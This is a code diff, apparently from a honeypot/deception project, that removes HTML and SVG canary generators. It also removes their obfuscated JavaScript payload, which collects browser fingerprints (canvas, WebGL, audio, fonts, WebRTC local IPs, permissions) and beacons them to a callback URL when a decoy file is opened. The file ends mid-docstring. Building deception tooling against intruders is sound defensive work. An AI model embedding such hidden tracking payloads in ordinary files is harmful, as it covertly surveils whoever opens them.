if an_count and answer_ip is not None:
|
||||
if an_count:
|
||||
# Use a name pointer back to the question (offset 12).
|
||||
ptr = struct.pack("!H", 0xC000 | 12)
|
||||
rdata = bytes(int(o) for o in answer_ip.split("."))
|
||||
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
||||
self._answer_ip = answer_ip
|
||||
self._transport: Optional[asyncio.DatagramTransport] = None
|
||||
|
||||
def connection_made(self, transport) -> None:
|
||||
self._transport = transport
|
||||
def connection_made(self, transport) -> None: # type: ignore[override]
|
||||
self._transport = transport # type: ignore[assignment]
|
||||
|
||||
def datagram_received(
|
||||
def datagram_received( # type: ignore[override]
|
||||
self, data: bytes, addr: Tuple[str, int],
|
||||
) -> None:
|
||||
try:
|
||||
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
|
||||
return
|
||||
# Known name — answer with our sinkhole IP, then fire the hook.
|
||||
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
|
||||
asyncio.ensure_future(self._hook(slug, query, addr[0]))
|
||||
asyncio.create_task(self._hook(slug, query, addr[0]))
|
||||
|
||||
def _slug_for(self, qname: str) -> Optional[str]:
|
||||
if not self._zone or not qname.endswith(self._suffix):
|
||||
|
||||
@@ -21,8 +21,6 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
|
||||
"honeydoc_docx",
|
||||
"honeydoc_pdf",
|
||||
"mysql_dump",
|
||||
"fingerprint_html",
|
||||
"fingerprint_svg",
|
||||
)
|
||||
|
||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||
@@ -66,16 +64,6 @@ def get_generator(name: str) -> CanaryGenerator:
|
||||
if name == "mysql_dump":
|
||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||
return MySQLDumpGenerator()
|
||||
if name == "fingerprint_html":
|
||||
from decnet.canary.generators.fingerprint_html import (
|
||||
FingerprintHtmlGenerator,
|
||||
)
|
||||
return FingerprintHtmlGenerator()
|
||||
if name == "fingerprint_svg":
|
||||
from decnet.canary.generators.fingerprint_svg import (
|
||||
FingerprintSvgGenerator,
|
||||
)
|
||||
return FingerprintSvgGenerator()
|
||||
raise ValueError(
|
||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||
)
|
||||
|
||||
@@ -1,291 +0,0 @@
|
||||
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
|
||||
// canary, harvests browser primitives, and beacons the result back to the
|
||||
// canary worker. Ported from canary-self-test.html with the rendering UI
|
||||
// stripped out.
|
||||
//
|
||||
// Three placeholders are substituted by the Python builder BEFORE
|
||||
// javascript-obfuscator runs:
|
||||
//
|
||||
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
|
||||
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
|
||||
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
|
||||
//
|
||||
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
|
||||
// then a fingerprint payload sent as a base64-URL query param on a second
|
||||
// GET so the existing worker records the hit even before step-4 POST
|
||||
// support lands. Both fail-open: any error short-circuits to next step.
|
||||
|
||||
(async function () {
|
||||
var BEACON_URL = "{{BEACON_URL}}";
|
||||
var MINT_UUID = "{{MINT_UUID}}";
|
||||
var MINT_NONCE = "{{MINT_NONCE}}";
|
||||
var fp = { mint: MINT_UUID };
|
||||
|
||||
function fire(url) {
|
||||
try {
|
||||
var img = new Image();
|
||||
img.src = url;
|
||||
} catch (e) { /* swallow */ }
|
||||
}
|
||||
|
||||
// 1) bare-open beacon — fires regardless of whether the rest succeeds
|
||||
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
|
||||
|
||||
function sha256(str) {
|
||||
var buf = new TextEncoder().encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
|
||||
return Array.from(new Uint8Array(h))
|
||||
.map(function (b) { return b.toString(16).padStart(2, "0"); })
|
||||
.join("");
|
||||
});
|
||||
}
|
||||
|
||||
// navigator
|
||||
try {
|
||||
fp.nav = {
|
||||
ua: navigator.userAgent,
|
||||
pl: navigator.platform,
|
||||
lg: navigator.language,
|
||||
lgs: (navigator.languages || []).join(","),
|
||||
ck: navigator.cookieEnabled,
|
||||
dnt: navigator.doNotTrack,
|
||||
hc: navigator.hardwareConcurrency,
|
||||
dm: navigator.deviceMemory || null,
|
||||
tp: navigator.maxTouchPoints,
|
||||
wd: navigator.webdriver === true,
|
||||
pdf: navigator.pdfViewerEnabled || null,
|
||||
};
|
||||
} catch (e) { fp.nav = { err: String(e) }; }
|
||||
|
||||
// screen
|
||||
try {
|
||||
fp.scr = {
|
||||
w: screen.width, h: screen.height,
|
||||
aw: screen.availWidth, ah: screen.availHeight,
|
||||
cd: screen.colorDepth, pd: screen.pixelDepth,
|
||||
dpr: window.devicePixelRatio,
|
||||
iw: window.innerWidth, ih: window.innerHeight,
|
||||
or: (screen.orientation && screen.orientation.type) || null,
|
||||
};
|
||||
} catch (e) { fp.scr = { err: String(e) }; }
|
||||
|
||||
// tz / locale
|
||||
try {
|
||||
var dtf = Intl.DateTimeFormat().resolvedOptions();
|
||||
fp.tz = {
|
||||
z: dtf.timeZone, lc: dtf.locale,
|
||||
ca: dtf.calendar, ns: dtf.numberingSystem,
|
||||
off: new Date().getTimezoneOffset(),
|
||||
};
|
||||
} catch (e) { fp.tz = { err: String(e) }; }
|
||||
|
||||
// connection
|
||||
try {
|
||||
var c = navigator.connection;
|
||||
fp.cn = c ? {
|
||||
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
|
||||
} : null;
|
||||
} catch (e) { fp.cn = { err: String(e) }; }
|
||||
|
||||
// canvas
|
||||
try {
|
||||
var cv = document.createElement("canvas");
|
||||
cv.width = 280; cv.height = 60;
|
||||
var ctx = cv.getContext("2d");
|
||||
ctx.textBaseline = "top";
|
||||
ctx.font = "14px Arial";
|
||||
ctx.fillStyle = "#f60";
|
||||
ctx.fillRect(125, 1, 62, 20);
|
||||
ctx.fillStyle = "#069";
|
||||
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
|
||||
ctx.fillStyle = "rgba(102,204,0,0.7)";
|
||||
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
|
||||
var dataURL = cv.toDataURL();
|
||||
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
|
||||
} catch (e) { fp.cv = { err: String(e) }; }
|
||||
|
||||
// webgl
|
||||
try {
|
||||
var gc = document.createElement("canvas");
|
||||
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
|
||||
if (gl) {
|
||||
var ext = gl.getExtension("WEBGL_debug_renderer_info");
|
||||
fp.gl = {
|
||||
v: gl.getParameter(gl.VENDOR),
|
||||
r: gl.getParameter(gl.RENDERER),
|
||||
ver: gl.getParameter(gl.VERSION),
|
||||
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
|
||||
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
|
||||
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
|
||||
};
|
||||
} else { fp.gl = { err: "unavailable" }; }
|
||||
} catch (e) { fp.gl = { err: String(e) }; }
|
||||
|
||||
// audio
|
||||
try {
|
||||
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
|
||||
if (ACtx) {
|
||||
var actx = new ACtx(1, 44100, 44100);
|
||||
var osc = actx.createOscillator();
|
||||
var cmp = actx.createDynamicsCompressor();
|
||||
osc.type = "triangle"; osc.frequency.value = 10000;
|
||||
cmp.threshold.value = -50; cmp.knee.value = 40;
|
||||
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
|
||||
osc.connect(cmp); cmp.connect(actx.destination);
|
||||
osc.start(0);
|
||||
var buf = await actx.startRendering();
|
||||
var data = buf.getChannelData(0).slice(4500, 5000);
|
||||
var sum = 0;
|
||||
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
|
||||
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
|
||||
} else { fp.au = { err: "unavailable" }; }
|
||||
} catch (e) { fp.au = { err: String(e) }; }
|
||||
|
||||
// fonts
|
||||
try {
|
||||
var bases = ["monospace", "sans-serif", "serif"];
|
||||
var tests = [
|
||||
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
|
||||
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
|
||||
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
|
||||
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
|
||||
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
|
||||
"San Francisco", "Helvetica Neue", "Lucida Grande",
|
||||
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
|
||||
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
|
||||
"Noto Sans", "Noto Mono",
|
||||
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
|
||||
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
|
||||
"Malgun Gothic", "Noto Sans CJK",
|
||||
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
|
||||
"Bahnschrift", "Cyberpunk",
|
||||
];
|
||||
var sp = document.createElement("span");
|
||||
sp.style.fontSize = "72px";
|
||||
sp.style.position = "absolute";
|
||||
sp.style.left = "-9999px";
|
||||
sp.innerHTML = "mmmmmmmmmmlli";
|
||||
document.body.appendChild(sp);
|
||||
var bs = {};
|
||||
for (var bi = 0; bi < bases.length; bi++) {
|
||||
sp.style.fontFamily = bases[bi];
|
||||
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
|
||||
}
|
||||
var det = [];
|
||||
for (var ti = 0; ti < tests.length; ti++) {
|
||||
for (var bj = 0; bj < bases.length; bj++) {
|
||||
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
|
||||
if (sp.offsetWidth !== bs[bases[bj]].w ||
|
||||
sp.offsetHeight !== bs[bases[bj]].h) {
|
||||
det.push(tests[ti]); break;
|
||||
}
|
||||
}
|
||||
}
|
||||
document.body.removeChild(sp);
|
||||
fp.ft = {
|
||||
h: await sha256(det.slice().sort().join(",")),
|
||||
n: det.length, t: tests.length, d: det,
|
||||
};
|
||||
} catch (e) { fp.ft = { err: String(e) }; }
|
||||
|
||||
// webrtc local ip leak
|
||||
try {
|
||||
var ips = {}; var cands = [];
|
||||
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
|
||||
window.mozRTCPeerConnection;
|
||||
if (RPC) {
|
||||
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
|
||||
pc.createDataChannel("");
|
||||
pc.onicecandidate = function (e) {
|
||||
if (!e.candidate) return;
|
||||
cands.push(e.candidate.candidate);
|
||||
var m = e.candidate.candidate.match(
|
||||
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
|
||||
if (m) ips[m[1]] = 1;
|
||||
};
|
||||
var off = await pc.createOffer();
|
||||
await pc.setLocalDescription(off);
|
||||
await new Promise(function (r) { setTimeout(r, 1500); });
|
||||
pc.close();
|
||||
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
|
||||
} else { fp.rtc = { err: "unavailable" }; }
|
||||
} catch (e) { fp.rtc = { err: String(e) }; }
|
||||
|
||||
// battery
|
||||
try {
|
||||
if (navigator.getBattery) {
|
||||
var bat = await navigator.getBattery();
|
||||
fp.bt = {
|
||||
c: bat.charging, l: bat.level,
|
||||
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
|
||||
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
|
||||
};
|
||||
} else { fp.bt = { err: "unavailable" }; }
|
||||
} catch (e) { fp.bt = { err: String(e) }; }
|
||||
|
||||
// perf timing jitter
|
||||
try {
|
||||
var samples = [];
|
||||
for (var pi = 0; pi < 1000; pi++) {
|
||||
var pa = performance.now();
|
||||
var x = 0;
|
||||
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
|
||||
samples.push(performance.now() - pa);
|
||||
}
|
||||
samples.sort(function (a, b) { return a - b; });
|
||||
fp.pf = {
|
||||
med: samples[500].toFixed(4),
|
||||
p95: samples[950].toFixed(4),
|
||||
mn: samples[0].toFixed(4),
|
||||
mx: samples[999].toFixed(4),
|
||||
};
|
||||
} catch (e) { fp.pf = { err: String(e) }; }
|
||||
|
||||
// permissions
|
||||
try {
|
||||
if (navigator.permissions) {
|
||||
var names = ["geolocation", "notifications", "camera", "microphone",
|
||||
"persistent-storage", "clipboard-read", "clipboard-write"];
|
||||
var st = {};
|
||||
for (var ni = 0; ni < names.length; ni++) {
|
||||
try {
|
||||
var r = await navigator.permissions.query({ name: names[ni] });
|
||||
st[names[ni]] = r.state;
|
||||
} catch (e) { st[names[ni]] = "unsupported"; }
|
||||
}
|
||||
fp.pm = st;
|
||||
} else { fp.pm = { err: "unavailable" }; }
|
||||
} catch (e) { fp.pm = { err: String(e) }; }
|
||||
|
||||
// composite identity hash — stable inputs only
|
||||
try {
|
||||
var stable = [
|
||||
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
|
||||
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
|
||||
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
|
||||
fp.scr && (fp.scr.w + "x" + fp.scr.h),
|
||||
].filter(Boolean).join("|");
|
||||
fp.id = await sha256(stable);
|
||||
} catch (e) { fp.id = { err: String(e) }; }
|
||||
|
||||
// 2) ship the payload as base64url JSON on a GET query param.
|
||||
// The current worker records the hit on /c/<slug>; step-4 worker
|
||||
// will decode ?d= and persist the fingerprint blob.
|
||||
try {
|
||||
var json = JSON.stringify(fp);
|
||||
var b64 = btoa(unescape(encodeURIComponent(json)))
|
||||
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
|
||||
// chunk if URL would exceed safe limit (~6KB)
|
||||
var MAX = 6000;
|
||||
if (b64.length <= MAX) {
|
||||
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
|
||||
} else {
|
||||
var sid = (Math.random() * 1e9 | 0).toString(36);
|
||||
var total = Math.ceil(b64.length / MAX);
|
||||
for (var ci = 0; ci < total; ci++) {
|
||||
var part = b64.substr(ci * MAX, MAX);
|
||||
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
|
||||
}
|
||||
}
|
||||
} catch (e) { /* swallow */ }
|
||||
})();
|
||||
@@ -1,140 +0,0 @@
|
||||
"""HTML fingerprint canary — plausible-looking page with an obfuscated
|
||||
browser-fingerprinting payload inlined at the bottom of ``<body>``.
|
||||
|
||||
The visible content is a deliberately mundane "internal directory"
|
||||
table — the kind of file a curious attacker pulls off a decky's
|
||||
filesystem and opens locally to triage. When the file is opened in
|
||||
*any* network-connected browser the obfuscated payload runs and beacons
|
||||
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
|
||||
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
|
||||
timing jitter, permissions, composite identity hash).
|
||||
|
||||
Determinism: the mint UUID is derived from the callback token via
|
||||
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
|
||||
output, satisfying the generator contract in :mod:`decnet.canary.base`.
|
||||
The obfuscator's seed and polymorphic config bits are likewise
|
||||
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import uuid
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||
|
||||
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||
|
||||
|
||||
def _mint_uuid_for(callback_token: str) -> str:
    """Return the mint UUID for *callback_token* in string form.

    The UUID is a name-based ``uuid5`` computed under ``_MINT_NAMESPACE``,
    so a given token always maps to the same value.
    """
    derived = uuid.uuid5(_MINT_NAMESPACE, callback_token)
    return str(derived)
|
||||
|
||||
|
||||
def _stable_int(callback_token: str, salt: str = "") -> int:
|
||||
"""Deterministic non-negative int derived from the callback token.
|
||||
|
||||
``builtins.hash`` is salted per-process — useless for a generator
|
||||
that must be byte-identical across runs. SHA-256 prefix is
|
||||
overkill but free.
|
||||
"""
|
||||
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
|
||||
return int.from_bytes(h[:4], "big")
|
||||
|
||||
|
||||
_PAGE_TEMPLATE = """<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<title>Internal Asset Directory</title>
|
||||
<style>
|
||||
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
|
||||
margin:24px;font-size:13px}}
|
||||
h1{{font-size:18px;margin:0 0 4px 0}}
|
||||
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
|
||||
table{{border-collapse:collapse;width:100%;background:#fff;
|
||||
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
|
||||
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
|
||||
th{{background:#f4f4f4;font-weight:600;font-size:11px;
|
||||
text-transform:uppercase;letter-spacing:.5px;color:#555}}
|
||||
tr:hover td{{background:#fafbff}}
|
||||
.foot{{margin-top:16px;color:#999;font-size:11px}}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Internal Asset Directory</h1>
|
||||
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
|
||||
<table>
|
||||
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
|
||||
{rows}
|
||||
</table>
|
||||
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
|
||||
<script>{payload}</script>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
|
||||
|
||||
_ROW_POOL = (
|
||||
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
|
||||
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
|
||||
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
|
||||
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
|
||||
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
|
||||
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
|
||||
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
|
||||
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
|
||||
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
|
||||
)
|
||||
|
||||
|
||||
def _build_rows(callback_token: str) -> tuple[str, int]:
    """Render the table body rows for one mint.

    A window of consecutive entries is taken from ``_ROW_POOL`` (wrapping
    around the end). Both the starting index and the window length (5 to
    8 rows) are derived from *callback_token* via ``_stable_int``, so the
    same token always yields the same rows.

    Returns:
        ``(markup, count)`` where *markup* is the newline-joined ``<tr>``
        elements and *count* is the number of rows rendered.
    """
    # Function-scope import keeps this block self-contained.
    import html

    pool_size = len(_ROW_POOL)
    start = _stable_int(callback_token, "pick") % pool_size
    take = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(start + i) % pool_size] for i in range(take)]
    # Escape every cell: pool entries such as "lag <1s" contain characters
    # that are markup-significant and would otherwise land raw in the page.
    cells = "\n".join(
        "<tr>" + "".join(f"<td>{html.escape(c)}</td>" for c in row) + "</tr>"
        for row in selected
    )
    return cells, len(selected)
|
||||
|
||||
|
||||
def _sync_label(callback_token: str) -> str:
    """Build the deterministic "last sync" timestamp label for the page.

    The day (01-28) and the hour (00-23) are derived from *callback_token*
    via ``_stable_int``; year, month and minutes are fixed.
    """
    day_of_month = 1 + _stable_int(callback_token, "day") % 28
    hour_of_day = _stable_int(callback_token, "hour") % 24
    return f"2026-04-{day_of_month:02d} {hour_of_day:02d}:14 UTC"
|
||||
|
||||
|
||||
class FingerprintHtmlGenerator(CanaryGenerator):
    """Generator for an HTML page that fingerprints the opening browser."""

    name = "fingerprint_html"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the HTML canary artifact for *ctx*.

        Every variable part of the page (mint UUID, nonce, obfuscated
        payload, table rows, sync label) is derived from
        ``ctx.callback_token``. The artifact is returned with an empty
        ``path``.
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        nonce = nonce_for(token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )

        rows, row_count = _build_rows(token)
        page = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(token),
            row_count=row_count,
            rows=rows,
            payload=payload,
        )

        # Recorded in the notes only; the payload computes its own beacon URL.
        beacon = f"{ctx.http_base.rstrip('/')}/c/{token}"
        notes = [
            f"obfuscated fingerprinter beacons={beacon}",
            f"mint_uuid={mint_uuid}",
        ]
        return CanaryArtifact(
            path="",
            content=page.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 14,  # 14 * 86400 s back, i.e. two weeks
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=notes,
        )
|
||||
@@ -1,88 +0,0 @@
|
||||
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
|
||||
that runs the obfuscated fingerprinter when the file is opened directly
|
||||
in a browser.
|
||||
|
||||
SVG ``<script>`` only fires when the SVG is loaded as a top-level
|
||||
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
|
||||
SVG is referenced from another page's ``<img>``. That's the right
|
||||
posture for canary use: an attacker browsing the decky filesystem and
|
||||
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
|
||||
inside a sandboxed CMS preview does not.
|
||||
|
||||
Same determinism guarantees as :mod:`fingerprint_html`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
|
||||
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||
|
||||
|
||||
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
|
||||
<style>
|
||||
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
|
||||
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
|
||||
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
|
||||
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
|
||||
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
|
||||
</style>
|
||||
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
|
||||
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
|
||||
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
|
||||
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
|
||||
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
|
||||
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
|
||||
<path class="edge" d="M160 105 L240 105"/>
|
||||
<path class="edge" d="M360 105 L440 105"/>
|
||||
<path class="edge" d="M300 130 L300 220"/>
|
||||
<script type="application/ecmascript"><![CDATA[
|
||||
{payload}
|
||||
]]></script>
|
||||
</svg>
|
||||
"""
|
||||
|
||||
|
||||
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
|
||||
|
||||
|
||||
class FingerprintSvgGenerator(CanaryGenerator):
    """Generator for an SVG diagram that fingerprints the opening browser."""

    name = "fingerprint_svg"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the SVG canary artifact for *ctx*.

        The region label, draft version and review day shown in the
        diagram are derived from ``ctx.callback_token`` via
        ``_stable_int``, as are the mint UUID, nonce and obfuscated
        payload. The artifact is returned with an empty ``path``.
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        nonce = nonce_for(token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )

        region_index = _stable_int(token, "reg") % len(_REGIONS)
        draft_version = 1 + (_stable_int(token, "ver") % 6)
        review_day = _stable_int(token, "day") % 28 + 1
        diagram = _DIAGRAM_TEMPLATE.format(
            region=_REGIONS[region_index],
            ver=draft_version,
            review=f"2026-03-{review_day:02d}",
            payload=payload,
        )

        # Recorded in the notes only; the payload computes its own beacon URL.
        beacon = f"{ctx.http_base.rstrip('/')}/c/{token}"
        notes = [
            f"obfuscated fingerprinter beacons={beacon}",
            f"mint_uuid={mint_uuid}",
        ]
        return CanaryArtifact(
            path="",
            content=diagram.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,  # 30 * 86400 s back, i.e. thirty days
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=notes,
        )
|
||||
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
try:
|
||||
from pikepdf import Pdf, Name, Dictionary, String
|
||||
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
||||
|
||||
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
try:
|
||||
from PIL import Image, PngImagePlugin
|
||||
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"image instrumenter requires Pillow; install it (`pip "
|
||||
|
||||
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
try:
|
||||
import pikepdf
|
||||
import pikepdf # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"PDF instrumenter requires pikepdf; install it (`pip "
|
||||
|
||||
@@ -1,177 +0,0 @@
|
||||
"""Per-mint JS obfuscator wrapper.
|
||||
|
||||
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
|
||||
Used by the fingerprint generators / instrumenters to produce a unique,
|
||||
hard-to-statically-analyse JS blob per canary mint.
|
||||
|
||||
Two design choices flow from the canary contract in :mod:`base`:
|
||||
|
||||
* **Determinism.** Generators must return byte-identical artifacts for
|
||||
the same ``(callback_token, http_base, dns_zone, persona)``. We
|
||||
derive a numeric seed from the callback token and pass it to the
|
||||
obfuscator's own ``seed`` option, and we derive the polymorphic
|
||||
config bits from the same hash so a re-mint reproduces exactly.
|
||||
* **Per-mint uniqueness.** Two different callback tokens produce
|
||||
structurally different output: different identifier names, different
|
||||
string-array rotation, optionally different transforms enabled.
|
||||
|
||||
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
|
||||
We pass code+options as JSON on stdin and read the obfuscated result
|
||||
from stdout. Stderr surfaces obfuscator failures.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import hmac
|
||||
import json
|
||||
import os
|
||||
import subprocess # nosec B404 — Node helper exec is the whole point
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
|
||||
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
|
||||
|
||||
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
|
||||
# specific runtime; default to PATH lookup.
|
||||
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
|
||||
|
||||
# Hard timeout for the obfuscator subprocess. Real runs on the
|
||||
# fingerprint payload sit well under 5s on a dev box.
|
||||
_TIMEOUT_S = 30
|
||||
|
||||
|
||||
class ObfuscatorError(RuntimeError):
    """Signals that the Node obfuscator helper failed or produced no output."""
|
||||
|
||||
|
||||
class FingerprintSecretMissing(RuntimeError):
    """Signals that ``DECNET_CANARY_FINGERPRINT_SECRET`` is not configured.

    Each fingerprint canary embeds a per-mint nonce derived from this
    server-side secret. Without the secret the worker has no way to
    validate incoming fingerprint beacons, so minting fails loudly
    instead of shipping a canary that can be defeated.
    """
|
||||
|
||||
|
||||
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
|
||||
|
||||
|
||||
def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Derive the per-mint fingerprint nonce.

    The nonce is an HMAC-SHA256 keyed with the server-side master secret
    (read from the environment variable named by
